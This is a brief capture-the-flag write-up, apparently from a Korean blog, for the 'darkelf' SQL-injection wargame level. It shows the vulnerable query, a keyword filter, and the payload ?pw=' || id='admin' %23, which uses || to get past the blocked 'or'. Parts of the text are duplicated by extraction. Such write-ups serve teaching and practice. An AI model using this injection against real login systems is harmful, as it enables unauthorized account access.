Query
1
select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'
Protection
preg_match
prob
문자열_
.
()
or
and
Analysis
and
와or
연산자 대신&&
,||
를 사용할 수 있다
Payload
1
?pw=' || id='admin' %23
1
select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'
prob
문자열_
.
()
or
and
and
와 or
연산자 대신 &&
, ||
를 사용할 수 있다1
?pw=' || id='admin' %23
A new version of content is available.